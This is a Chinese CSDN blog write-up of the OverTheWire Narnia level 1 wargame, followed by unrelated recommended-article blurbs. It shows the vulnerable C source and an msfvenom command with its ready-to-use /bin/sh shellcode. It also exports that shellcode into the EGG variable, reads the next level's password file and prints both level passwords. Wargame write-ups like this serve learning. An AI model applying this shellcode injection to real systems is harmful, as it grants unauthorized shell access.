二进制学习之narnia1

最新推荐文章于 2021-12-09 11:31:01 发布

原创最新推荐文章于 2021-12-09 11:31:01 发布 · 287 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#narnia2

逆向专栏收录该内容

3 篇文章

订阅专栏

本文介绍通过构造特殊环境变量EGG,利用Narnia1的漏洞获取更高权限bash的方法。通过使用msfvenom生成shellcode并设置EGG环境变量,最终成功执行并读取narnia2的密码。

密码：narnia1:efeidiedae

分析

查看narnia1.c

#include <stdio.h>
int main(){
    int (*ret)();

    if(getenv("EGG")==NULL){
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();

    return 0;
}
n

这里判断egg环境变量是否存在，若不存在，报错后退出，若存在，执行该变量内容，因此可以通过构造egg变量获取高权限bash
在这里插入图片描述

构造

msfvenom构造shellcode

msfvenom -p linux/x86/exec CMD=/bin/sh  -b "\x00" -f c

得到shellcode

"\xbe\xef\x99\xa1\xd7\xdb\xde\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x0b\x83\xc7\x04\x31\x77\x11\x03\x77\x11\xe2\x1a\xf3\xaa\x8f\x7d\x56\xcb\x47\x50\x34\x9a\x7f\xc2\x95\xef\x17\x12\x82\x20\x8a\x7b\x3c\xb6\xa9\x29\x28\xc0\x2d\xcd\xa8\xfe\x4f\xa4\xc6\x2f\xe3\x5e\x17\x67\x50\x17\xf6\x4a\xd6"

在这里插入图片描述
设置EGG环境变量

export EGG=$(python -c 'print "\xbe\xef\x99\xa1\xd7\xdb\xde\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x0b\x83\xc7\x04\x31\x77\x11\x03\x77\x11\xe2\x1a\xf3\xaa\x8f\x7d\x56\xcb\x47\x50\x34\x9a\x7f\xc2\x95\xef\x17\x12\x82\x20\x8a\x7b\x3c\xb6\xa9\x29\x28\xc0\x2d\xcd\xa8\xfe\x4f\xa4\xc6\x2f\xe3\x5e\x17\x67\x50\x17\xf6\x4a\xd6"')

获取权限

./narnia1
cat /etc/narnia_pass/narnia2
获取密码 narnia2:nairiepecu

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

sojrs_sec

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

二进制学习之narnia0

sojrs_sec的博客

09-03

413

学习平台：http://overthewire.org/wargames/narnia/ 密码：narnia0:narnia0 Cd /narnia 一：分析运行 ./narnia0 从提示看，要我们把val的值从0x41414141 转换成0xdead 执行后会提示我们输入值，我这里输入一堆a，发现buf为24字节的a，val为a的16进制数而当输入值只有一个a时，val为0x414141...

《黑客秘笈——渗透测试实用指南》读书笔记（1）

ShirlyTL的博客

12-20

6198

渗透学习 1.1搭建测试环境 Linux和 Windows兼备 1.2建立一个域 1.3建立其他服务器 Metasploitable2(一个优秀的 Ubuntu Linux虚拟机) 下载地址：http://sourceforge.net/projects/metasploitable/files/Metasploitable2 OWASPBWA(漏洞网站多) ht

参与评论您还未登录，请先登录后发表或查看评论

narnia1

shuimuyq的专栏

02-16

612

/** narnia1.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundatio

170825 WarGames-Narnia（1-2）

whklhhhh的博客

08-25

661

1625-5 王子昂总结《2017年8月25日》【连续第326天总结】 A. WarGame-Narnia B. Level 1 int __cdecl main(int argc, const char **argv, const char **envp) { char *v3; // ST1C_4@4 if ( !getenv("EGG") ) { put

wargame narnia writeup

weixin_34392843的博客

03-08

336

litao3rd · 2015/04/09 11:02前言这一期的wargame难度明显比之前的leviathan要高，而且已经涉及到相对完善的Linux溢出相关知识了。但是在overthewire上这才居然只是2/10的难度，看来我差得很远啊。在narnia首页，有如下提示，使用初始账号和密码登陆到目标机器，关于本wargame的所有文件都在/narnia文件夹下面。Let's goTo log...

OverTheWire-Narnia

kang0x0的博客

12-09

3547

文章目录前言Level 0 -> Level 1Level 1 -> Level 2Level 2 -> Level 3Level 3 -> Level 4Level 4 -> Level 5Level 5 -> Level 6Level 6 -> Level 7总结前言本篇文章为OverTheWire网站Narnia关卡的学习记录。通过ssh narniaX@narnia.labs.overthewire.org 2226 进行登录。参考Writeup

Narnia Wallpaper New Tab Background-crx插件

03-13

这是Narnia Wallpaper New Tab Background的扩展，Nannia Wallpaper New Tab Background使我们的童年时代成为电影毫无疑问，《纳尼亚传奇》是一部电影，它定义了我们许多人的数百万个童年，就像我们一样。如果您想...

narnia5

shuimuyq的专栏

02-16

471

/** narnia5.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundatio

缓冲区溢出利用——捕获eip的傻瓜式指南

weixin_30462049的博客

12-17

903

[译文] 摘要：为一个简单的有漏洞程序写一个简单的缓冲区溢出EXP，聚焦于遇到的问题和关键性的教训，提供详细而彻底的描述内容表：1. I pity the fool, who can't smash the stack:--介绍&背景2.Welcome to the jungle, we've got fun and wargames:--介绍我们之后要使用的示例&分析它的源...

linux系统启动过程

NARNIA

11-26

393

设备上电后linux系统的启动过程主要包括以下四个步骤： 1.BIOS自检识别主机上可以启动的设备，一次只能从一个设备上启动，如果一个启动设备失效，就使用下一个候选启动设备。通常是硬盘启动。启动驻留在硬盘主引导记录MBR中的引导程序Grub或者Lilo。 2.Grub/Lilo引导启动：如果注意中安装多个操作系统，用户通过Grub或者Lilo引导启动linux系统。此时的操作系统还没有

170823 WarGames-Narnia（0）

whklhhhh的博客

08-23

444

1625-5 王子昂总结《2017年8月23日》【连续第324天总结】 A. Narnia B. Level 0文件在/narnia/中，运行narnia0，提示要将value从0x41414141变为0xdeadbeef 拖下来IDA反编译可知int __cdecl main(int argc, const char **argv, const char **envp) { i

C# 爬虫（var X$4 = [''\x5f', '\x2d']）解密方法

banggun20080126的博客

04-12

356

我最近遇到下面形式的代码，研究一天终于在网上找到下面解码方式：仿照地址：https://zhidao.baidu.com/question/199754638031264525.htmlvar X$4 = ['\x5f', '\x2d', '\x2c', '\x61', '\x62', '\x63', '\x64', '\x65', '\x66', '\x67', '\x68', '\x...

《黑客秘笈——渗透测试实用指南（第2版）》—第1章1.6学习

weixin_34037173的博客

05-02

420

本节书摘来自异步社区《黑客秘笈——渗透测试实用指南（第2版）》一书中的第1章1.6节学习，作者【美】Peter Kim（皮特基姆）,更多章节内容可以访问云栖社区“异步社区”公众号查看。 1.6　学习阅读本书的人员需要初步掌握Nmap、Metasploit、Cain and Abel和aircrack等工具使用原理。您最好对Python/Ruby等高级语...

【四旋翼飞行器】【模拟悬链机器人的动态】设计和控制由两个四旋翼飞行器推动的缆绳研究（Matlab代码实现）

11-26

【四旋翼飞行器】【模拟悬链机器人的动态】设计和控制由两个四旋翼飞行器推动的缆绳研究（Matlab代码实现）内容概要：本文围绕“设计和控制由两个四旋翼飞行器推动的缆绳系统”展开研究，通过建立动力学模型并利用Matlab进行仿真，模拟类似悬链机器人的动态行为。研究重点在于多无人机协同控制、缆绳张力分析及系统稳定性控制，结合非线性动力学与控制理论，实现对柔性连接负载的精确操控。文中提供了完整的Matlab代码实现，便于复现实验结果，适用于复杂空中作业任务的仿真验证。; 适合人群：具备一定控制理论基础和Matlab编程能力的研究生、科研人员及从事无人机协同控制、机器人系统开发的工程技术人员。; 使用场景及目标：①研究多无人机协同搬运与柔性负载控制；②掌握缆绳系统动力学建模与仿真方法；③应用于空中机器人、工业吊装、救援运输等实际场景的控制系统设计与优化；阅读建议：建议结合Matlab代码逐模块分析，重点关注动力学建模、控制律设计与仿真结果验证部分，可进一步扩展至更多无人机协同或复杂环境干扰下的鲁棒性研究。

基于遗传算法的梯级水电站群联合火电厂优化调度研究（Python代码实现）

11-26

基于遗传算法的梯级水电站群联合火电厂优化调度研究（Python代码实现）内容概要：本文研究了基于遗传算法的梯级水电站群联合火电厂优化调度问题，旨在通过智能优化方法实现电力系统中水火电资源的协调调度，提升能源利用效率与调度经济性。文中构建了考虑水电站间水力联系、水库库容约束、机组出力特性及火电厂运行成本的综合优化模型，并采用遗传算法进行求解，给出了完整的Python代码实现。该方法能够有效处理复杂的非线性、多约束、多变量调度问题，具备良好的收敛性和实

无人机基于改进粒子群算法的无人机路径规划研究[和遗传算法、粒子群算法进行比较]（Matlab代码实现）

最新发布

11-26

【无人机】基于改进粒子群算法的无人机路径规划研究[和遗传算法、粒子群算法进行比较]（Matlab代码实现）内容概要：本文围绕基于改进粒子群算法的无人机路径规划展开研究，重点探讨了在复杂环境中利用改进粒子群算法（PSO）实现无人机三维路径规划的方法，并将其与遗传算法（GA）、标准粒子群算法等传统优化算法进行对比分析。研究内容涵盖路径规划的多目标优化、避障策略、航路点约束以及算法收敛性和寻优能力的评估，所有实验均通过Matlab代码实现，提供了完整的仿真验证流程。文章还提到了多种智能优化算法在无人机路径规划中的应用比较，突出了改进PSO在收敛速度和全局寻优方面的优势。; 适合人群：具备一定Matlab编程基础和优化算法知识的研究生、科研人员及从事无人机路径规划、智能优化算法研究的相关技术人员。; 使用场景及目标：①用于无人机在复杂地形或动态环境下的三维路径规划仿真研究；②比较不同智能优化算法（如PSO、GA、蚁群算法、RRT等）在路径规划中的性能差异；③为多目标优化问题提供算法选型和改进思路。; 阅读建议：建议读者结合文中提供的Matlab代码进行实践操作，重点关注算法的参数设置、适应度函数设计及路径约束处理方式，同时可参考文中提到的多种算法对比思路，拓展到其他智能优化算法的研究与改进中。

图像重建使用FDK的三维谢普洛根幻影重建（Matlab代码实现）

11-26

【图像重建】使用FDK的三维谢普洛根幻影重建（Matlab代码实现）内容概要：本文介绍了使用FDK算法在Matlab环境中实现三维谢普洛根幻影（Shepp-Logan phantom）图像重建的技术方法，重点展示了图像重建过程中的关键步骤与代码实现。该资源属于一系列图像处理与医学成像技术研究的一部分，涵盖了从投影数据生成到反投影重建的完整流程，帮助读者理解CT图像重建的基本原理与FDK算法的应用细节。; 适合人群：具备一定Matlab编程基础，从事医学图像处理、计算机断层成像（CT）或相关领域研究的研究生、科研人员及工程技术人员。; 使用场景及目标：①学习和掌握FDK算法在三维图像重建中的具体实现；②理解Shepp-Logan幻影模型在仿真成像中的作用；③为医学图像重建、算法验证与教学演示提供可运行的Matlab代码参考；阅读建议：建议结合Matlab代码逐行调试，理解投影（正弦图）生成与滤波反投影的每一步操作，同时可延伸学习其他重建算法（如FBP

【大数据搜索技术】Elasticsearch7.8安装部署与集群管理：基于CentOS的分布式搜索引擎配置及性能优化实践

11-26

内容概要：本文详细介绍了Elasticsearch 7.8的安装部署及核心功能应用，涵盖环境准备、解压配置、启动优化、集群搭建、分片管理、健康监控等内容，并结合Kibana和Logstash构建完整的ELK日志分析体系。文章还讲解了中文分词器IK的使用、快照备份与恢复机制，以及如何通过Filebeat采集Nginx等服务的日志数据并进行可视化展示，系统性地呈现了Elasticsearch在实际生产环境中的部署与运维流程。; 适合人群：具备Linux基础和一定运维经验的技术人员，尤其是从事日志分析、搜索系统搭建或中间件维护的开发与运维工程师；适合初学者入门Elasticsearch及相关生态组件。; 使用场景及目标：①掌握Elasticsearch单节点与集群环境的安装与配置；②理解索引、分片、副本等核心概念并应用于实际业务；③构建基于Filebeat+Logstash+ES+Kibana的日志采集与分析链路；④实现数据的备份恢复与中文检索功能；阅读建议：建议按照文档顺序逐步操作，重点关注配置参数调优与常见错误处理（如权限、虚拟内存限制），动手实践集群部署与日志采集流程，结合Kibana进行数据验证与可视化分析，加深对ELK生态协同工作的理解。

纳尼亚narnia: Tor隐藏服务网络服务器快速启动指南

在描述中，我们看到对纳尼亚（narnia）这个特定的网络服务器的介绍，以及一些关于它的用法的示例。描述中的知识点包括： - **纳尼亚narnia**：这是一款为Tor隐藏服务设计的网络服务器软件。Tor是一个著名的用于匿名...